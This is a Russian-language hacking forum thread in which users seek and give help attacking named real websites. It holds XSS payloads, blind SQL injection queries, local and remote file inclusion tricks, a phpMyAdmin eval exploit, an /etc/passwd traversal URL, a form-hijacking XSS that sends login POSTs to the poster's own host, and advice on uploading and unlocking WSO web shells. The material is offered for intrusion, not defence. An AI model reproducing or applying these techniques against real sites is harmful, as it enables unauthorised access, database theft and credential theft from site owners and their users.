↑ (https://antichat.live/posts/3879643/)
В общем вот сайт
http://www.tvzavr.ru/
Netsparker показывает уязвимости Netsparker
Cookie Not Marked as Secure
Cross-site Scripting -
.SpoilerTarget" type="button">Spoiler: Отчёт
Url http://www.tvzavr.ru/filmy?sort='"-->netsparker(0x00052A) (http://www.tvzavr.ru/filmy?sort=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x00052A)%3C/scRipt%3E)
.SpoilerTarget" type="button">Spoiler: Отчёт
Parameter Name sort
Parameter Type GET
Attack Pattern '"-->netsparker(0x00052A)
Можно как нибудь слить BD или накасячить на сайте ?
это означает что куки не имеют флага http-only, что означает возможность угона, в том числе авторизационной куки, если такая есть там, в случае наличия XSS уязвимости, с помощью JS скрипта.
Надеюсь достаточно полно получилось объяснить, если нет. прошу коллег подправить.
Что, захотелось себе на телевизор каналов бесплатно? не советую, так себе сервис и каналы не очень Это относительно самого сообщения.
То что под спойлером, похоже на указание наличия XSS, судя по всему отраженному.
Sensoft said:
↑ (https://antichat.live/posts/3879643/)
В общем вот сайт
http://www.tvzavr.ru/
Netsparker показывает уязвимости Netsparker
Cookie Not Marked as Secure
Cross-site Scripting -
.SpoilerTarget" type="button">Spoiler: Отчёт
Url http://www.tvzavr.ru/filmy?sort='"-->netsparker(0x00052A) (http://www.tvzavr.ru/filmy?sort=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x00052A)%3C/scRipt%3E)
.SpoilerTarget" type="button">Spoiler: Отчёт
Parameter Name sort
Parameter Type GET
Attack Pattern '"-->netsparker(0x00052A)
Можно как нибудь слить BD или накасячить на сайте ?
для начала стоит прочитать что это за уязвимость и что позволяет сделать
есть blind boolean based sql inj в поле авторизации
база - Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0
название базы достает, таблицы, колонки достает, а данные не хочет.
Помогите составить запрос.
' or ASCII(CAST(SUBSTRING((SELECT TOP 1 Login FROM Users),1,1) AS VARCHAR(8000)))>1-- ->false =не работает
Как достать данные?
Спасибо.
wkar said:
↑ (https://antichat.live/posts/3879891/)
есть blind boolean based sql inj в поле авторизации
база - Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0
название базы достает, таблицы, колонки достает, а данные не хочет.
Помогите составить запрос.
' or ASCII(CAST(SUBSTRING((SELECT TOP 1 Login FROM Users),1,1) AS VARCHAR(8000)))>1-- ->false =не работает
Как достать данные?
Спасибо.
Походу колонка логин пуста о_О, потому что
ASCII(CAST(SUBSTRING((SELECT TOP 1 customer_type FROM Users),1,1) AS VARCHAR(8000)))>1-- -> TRUE
И там там только одна запись
Почему с остальных колонок не достает инфу ?
http://cubinfo.mobi/view.php?id=616662','(select+version())
можно как-то инфу вывести?
qaz said:
↑ (https://antichat.live/posts/3879953/)
http://cubinfo.mobi/view.php?id=616662','(select+version())
можно как-то инфу вывести?
http://higgs.rghost.ru/6L4wxnzKL/image.png
DJ ][akep
15.08.2015, 07:34
Есть код подруба языка
PHP:
include('languages/'.$_GET['lang'].'/index.php');
По дерикториям прыгать получается ?lang=en/../../ - такой запрос инклудит индексный файл в корне сайта), нулёвый байт не прокатит из за версии php
Может есть какие-то идейки?)
ну как бы альтернатива нульбайта из /././././[4096]./.
Genius Black
15.08.2015, 14:03
Подскажите на какой хостинг можно залить шелл, чтобы вставить его в Remove file Inclusion
Есть скрипт с уязвимой админ-панелью. Как правильно составить запрос, чтобы авторизоваться?
--
Убрано
--
Уязвимость в стиле "admin" or 1=1/*
В коде присутствует проверка и на сессии, Через get запрос я пытался.
То есть как правильнее подставить запрос "admin or 1=1/*" и почему это работает так, а не как то иначе?
Muracha (https://forum.antichat.net/members/169610/), SQL-инъекция в пределах этого кода в настоящее время не эксплуатационна. Возможно наличие хранимой XSS, через неё зайти реально.
Genius Black said:
↑ (https://antichat.live/posts/3880400/)
Подскажите на какой хостинг можно залить шелл, чтобы вставить его в Remove file Inclusion
ttp://www.uploadedit.com/_to-upload-documents-onto-internet-PLAIN-TEXT-TXT-hosting.htm (http://www.uploadedit.com/_to-upload-documents-onto-internet-PLAIN-TEXT-TXT-hosting.htm)
глупый вопрос можно) например есть уязвимый сайт к скл инжекшен) нашел ее, просмотрел таблицы нашел логин и пасс сисадмина)
к фтп он не подходит, можно как то к базе через kali linux подключится с этим логином и паролем? доступ к sql shell есть если что
ocheretko
16.08.2015, 22:11
Скорее всего логин и пасс от админ панели. Админ панель нужно найти, например, можно воспользоваться программой для поиска админки.
Что за sql shell доступ у Вас есть?
обычного юзера, который особо не имеет прав только читает данные таблиц. к админке пасс не подошел) там помоему скрипт нерабочий, а так админок нету пхпмайадмин тоже не нашел
lдиректории пробовал найти и через модуль websploit и через inuscan одна админка accaunts ито нерабочая, ну пасс не подошел, сайт просто исламский чтото интересно стало)
ocheretko
17.08.2015, 03:08
Может быть у кого-то получится обойти WAF
Code:
https://www.banki.ru/news/bankimail/subscribe/?a=0&email=" type=text autofocus onfocus=alert() id=">
Как составить запрос в sqlmap, чтобы он брал строку из файла и проверял каждую персонально без обращение к google? аналог
python sqlmap.py - g
ocheretko said:
↑ (https://antichat.live/posts/3881069/)
Может быть у кого-то получится обойти WAF
Code:
https://www.banki.ru/news/bankimail/subscribe/?a=0&email=" type=text autofocus onfocus=alert() id=">
ocheretko,Сервер банит IP. О таком надо предупреждать.
можно вопрос нашел уязвимый сайт , там blind sql injection
он медленно подбирает таблицы видимо вслепую) поставил для перебора количество потоков равным 10
current user is dba :true (база оракле)
пытаюсь запустать скл шелл пишет operation system shell functionality not yet implemented for oracle)
чтото можно сделать?) ато там баз много и юзеров баз много до пенсии будет перебирать )
Нашел активную xss на сайте ,пытаюсь красть логи таким способом,но так не получается почему то,хотя когда копирую их сайт и заливаю на свой хостинг то все поллучается,есть ли другой способ красть пароли из POST запросов?
Вот мой base.php
Code:
Вот сам submit
И так обращяюсь к submit.
document.getElementById('lsform').action="http://мойхост.ru/base.php?";
Здравствуйте!! Есть доступ к phpMyAdmin - 2.11.8.1deb5+lenny9
server_databases.php?pos=0&dbstats=0&sort_by="]) OR eval($_REQUEST[cmd]); //&sort_order=desc&token=a327a405644acbcce02edb41461a58c9&cmd=phpinfo();
Сплоит не работает , ответ
SQL-запрос:
SELECT `information_schema`.`SCHEMATA` . *
FROM `information_schema`.`SCHEMATA`
GROUP BY BINARY `information_schema`.`SCHEMATA`.`SCHEMA_NAME`
ORDER BY BINARY `"]) OR eval($_REQUEST[cmd]); //` DESC
Ответ MySQL:
#1054 - Unknown column '"]) OR eval($_REQUEST[cmd]); //' in 'order clause'
как раскрутить помогите и сильно не ругайте я только начинаю.
nik1201 said:
↑ (https://antichat.live/posts/3881679/)
Нашел активную xss на сайте ,пытаюсь красть логи таким способом,но так не получается почему то,хотя когда копирую их сайт и заливаю на свой хостинг то все поллучается,есть ли другой способ красть пароли из POST запросов?
Вот мой base.php
Как выглядит XSS и где она?
zifus said:
↑ (https://antichat.live/posts/3881743/)
Здравствуйте!! Есть доступ к phpMyAdmin - 2.11.8.1deb5+lenny9
Сплоит не работает , ответ
Какую CVE вы хотите проэксплуатировать? Также, вы можете выполнять стандартные SQL запросы, в том числе и LOAD DATA LOCAL INFILE.
XAMEHA said:
↑ (https://antichat.live/posts/3881974/)
Как выглядит XSS и где она?
Какую CVE вы хотите проэксплуатировать? Также, вы можете выполнять стандартные SQL запросы, в том числе и LOAD DATA LOCAL INFILE.
Мне нужно залить шелл на сайт.. В PMA Нет привилегий..
Code:
http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php?filesrc=../../../../etc/passwd
Подскажите как можно обойти.
3nvY said:
↑ (https://antichat.live/posts/3882149/)
Code:
http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php?filesrc=../../../../etc/passwd
Подскажите как можно обойти.
Code:
http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php
404 как бэ, да и плюс http://bit.ly/1J4XXyF уже сломали переломали
Pro100Nyan
20.08.2015, 01:58
Что то есть?
Code:
http://riot.mail.ru/info/news/index.php?show=dat&date=12082015'
Что можно с этого поиметь...
exception 'Exception' with message 'Disabled' in /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_theme.php:1019 Stack trace: #0 [internal function]: template_preprocess_theme_wallet_info(Array, 'theme_wallet_in...') #1 /var/www/vhosts//includes/theme.inc(710): call_user_func_array('template_prepro...', Array) #2 /tmp/tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u5 4jkaA.php(25): theme('theme_wallet_in...') #3 /var/www/vhosts//themes/engines/phptal/PHPTAL.php(675): tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u5 4jkaA(Object(PHPTAL), Object(PHPTAL_Context)) #4 /var/www/vhosts//themes/engines/phptal/phptal.engine(86): PHPTAL->execute() #5 /var/www/vhosts//includes/theme.inc(738): phptal_render_template('sites/all/modul...', Array) #6 /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_room.php(1273): theme('apparat_select') #7 /var/www/vhosts//sites/all/modules/custom/casino/casino.module(318): ctrl_room->http_apparat(Array) #8 [internal function]: casino_menu_callback('room', 'apparat') #9 /var/www/vhosts//includes/menu.inc(350): call_user_func_array('casino_menu_cal...', Array) #10 /var/www/vhosts//index.php(53): menu_execute_active_handler() #11 {main}
There is a problem with the phptal theme engine Please refer to the documentation on the PHPTAL project page (http://drupal.org/project/phptal).
Есть сайт на Drupal в загрузку картинок заливаю shell.php%00ipg заливается.Пробовал ище в коментах exif мини-шелл прописать. Но меняет имя файла, иду по адресу файла открываю и ничего не происходит.
Как я понял стоит imagecache drupal можна вообще таким способом залить шелл или мини-шелл?
Ище фильтрация на сайте
Emphasized Emphasized Emphasized
Strong Strong Strong
Cited Cited Cited
Coded text used to show programming source code Coded Coded
Character Description You Type You Get
Ampersand & &
Greater than > >
Less than <
Не получается залить шелл .
Вообщем есть админка на сайте.Админка самописная.
Картинки можно заливать .jpg .png .gif ,остальные расширения нельзя, выдаёт ошибки которые появляются прямо в самой админке .
.SpoilerTarget" type="button">Spoiler: Вот ошибки
Warning: Unsupported image type in /home/*******/*******.ru/admin/gdResizer.php on line 75
Warning: Division by zero in /home/*******/*******/admin/gdResizer.php on line 227
Warning: Division by zero in /home/*******/*******.ru/admin/gdResizer.php on line 228
Warning: imagecreatetruecolor(): Invalid image dimensions in /home/*******/*******.ru/admin/gdResizer.php on line 241
Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in /home/*******/*******.ru/admin/gdResizer.php on line 250
Warning: Unsupported image type in /home/*******/*******.ru/admin/gdResizer.php on line 107
Пытаюсь залить шелл с расширением .jpg или .png или .gif тоже ошибки .
Пробую Shell.php.jpg не катит,даже с %0 .
Пробую через Image Manager,выбираю файл shell.php,пишет файл загружен,но его там нет .
Пробовал даже .htacces залить,и то не помогает .
Есть возможность писать отзывы .
Пишу в строку "Автор" - '(кавычку,одинарную),пишу текст,буква d . Вылезает это You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd','2015-08-26 16:58:08')' at line 1 .
А что дальше с SQL делать не знаю . Остальные запросы блокирует . Видимо некоторые символы блокирует .
На заметку : сайт на .html .
Помогите,а то уже нет сил .
ocheretko
26.08.2015, 22:31
Есть sql иньекция - раскручивайте. Может быть будут права через базу залить шелл.
Ваш загружаемый файл обрабатывается с помощью библиотеки GD - библиотека php для работы с графическими файлами. Она создает новое корректное изображение с уже существующего. Думаю не получится загрузить другой файл кроме картинки. Просто на сайте нет обработчика ошибок, и включен вывод ошибок
То, что сайт на html ничего не значит. Если Вы получили сообщение об ошибке mysql уже заслуживает внимание и может рассматриваться как потенциальная уязвимость.
P.S. И дай Вам бог сил. В нашей работе - главное терпение
Помогите разобраться с OpenCart 1.5.4.1
http://www.slideshare.net/DefconRussia/reutov-yunusov-nagibin-random-numbers-take-ii с страницы 46
как я понял нужно скомпилировать на стр 49
Вообще может есть какая то инфа то OpenCart 1.5.4.1
WallHack
27.08.2015, 20:46
Возможно ли раскрутить Фрагментированную SQL инъекцию
Отсутствие фильтрации символа обратного слэша \
http://fortunae-filius.ru/reg.htm
BabaDook
28.08.2015, 13:08
Muracha said:
↑ (https://antichat.live/posts/3881082/)
Как составить запрос в sqlmap, чтобы он брал строку из файла и проверял каждую персонально без обращение к google? аналог
python sqlmap.py - g
sqmap -m путь в файлу
Заливаю Shell WSO через админку .
Shell заливал в /news .
Составил линку http://********.com/upload/news/wso2.php
Вылезает вот это :
http://s018.radikal.ru/i502/1508/f9/3e47213a616d.png
SaNDER said:
↑ (https://antichat.live/posts/3885203/)
Заливаю Shell WSO через админку .
Shell заливал в /news .
Составил линку
http://********.com/upload/news/wso2.php
Вылезает вот это :
http://s018.radikal.ru/i502/1508/f9/3e47213a616d.png
опробуйте pas
winstrool
28.08.2015, 13:59
yarbabin said:
↑ (https://antichat.live/posts/3885208/)
опробуйте pas
Тут pas не поможет, это php расширение интерпретируется как html код, нужно пробывать играться с расширением или путь выше искать...
winstrool
28.08.2015, 14:21
SaNDER said:
↑ (https://antichat.live/posts/3885217/)
Шелл залился . Пароль узнал,да только он всё равно заходить не желает .
т.е идет выполнение как PHP? если да, то сделайте шелл без пароля!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot